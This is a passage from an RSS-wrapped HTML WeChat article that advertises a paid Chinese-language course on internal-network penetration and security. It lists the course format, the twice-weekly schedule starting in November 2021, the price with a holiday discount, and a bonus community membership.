0px;font-weight: bold;color: black;font-size: 22px;" data-darkreader-inline-color=""><span style="display: none;"></span>课程结构</h2><figure data-tool="mdnice编辑器" style="margin: 0;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="1.6972450175849942" data-w="3412" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=e6fe0ac7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGaAowGe5E9eb8UhiaLYejaNCP7LuaCq84vbPMEOYllzDp5q3ZibEZWAeQxVgKQtpLFJ5cicuMhmRuNg%2F640%3Fwx_fmt%3Dpng"/></figure><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;" data-darkreader-inline-color=""><span style="display: none;"></span>授课方式</h2><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0px;line-height: 26px;color: black;" data-darkreader-inline-color="">培训采用 线上授课 + 视频录播 的授课方式，交流群随问随答。</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;" data-darkreader-inline-color=""><span style="display: none;"></span>上课时间</h2><section style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0px;line-height: 26px;color: black;text-indent: 2em;" data-darkreader-inline-color="">由于课后有大量的练习、作业。经慎重考虑后我们决定一周只安排两天课，留出时间给学员练习和吸收。每周只安排两天课，共 6 周 36 课时，由浅入深，感受内网安全魅力。开课时间，2021 年 11 月 15 日。</section><ul data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: disc;" class="list-paddingleft-2" data-darkreader-inline-color=""><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1, 1, 1);font-weight: 500;" data-darkreader-inline-color="">周三 <strong style="font-weight: bold;color: black;" data-darkreader-inline-color="">19:30 - 21:30</strong></section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;text-align: left;color: rgb(1, 1, 1);font-weight: 500;" data-darkreader-inline-color="">周日 <strong style="font-weight: bold;color: black;" data-darkreader-inline-color="">14:00 -18:00</strong></section></li></ul><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;" data-darkreader-inline-color=""><span style="display: none;"></span>课程费用</h2><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;margin: 0px;line-height: 26px;color: black;" data-darkreader-inline-color="">课程定价 <strong style="font-weight: bold;color: black;" data-darkreader-inline-color="">6888</strong>，<strong><span style="font-size: 18px;color: rgb(255, 0, 0);" data-darkreader-inline-color="">十一假期结束前报名立减1000</span></strong><span style="font-size: 18px;color: rgb(255, 0, 0);" data-darkreader-inline-color="">，</span>加入即送 宽字节安全知识星球  名额，涉及 <strong style="font-weight: bold;color: black;" data-darkreader-inline-color="">java安全，红蓝对抗，内网渗透，漏洞研究等安全领域</strong>，星球长期更新，欢迎各位大佬加入交流。</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;padding: 0px;font-weight: bold;color: black;font-size: 22px;" data-darkreader-inline-color=""><span style="display: none;"></span>联系方式</h2></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="1.3936170212765957" data-s="300,640" style="" data-type="png" data-w="564" src="https://wechat2rss.xlab.app/img-proxy/?k=e9207b1f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEGnzia9FAtMgeVYJQDibUw6M1Uu0iaB14smHeX2mWfPbc7l4pCZLqokCmiaiaFiavIianxCosOicvZUAUluw%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p>



<p><a href="2247485438">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=81e4e312&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUzNTEyMTE0Mw%3D%3D%26mid%3D2247485438%26idx%3D3%26sn%3D663da8762314aff8bcf0e359b1107f0f%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 30 Sep 2021 09:00:00 +0800</pubDate>
    </item>
  </channel>
</rss>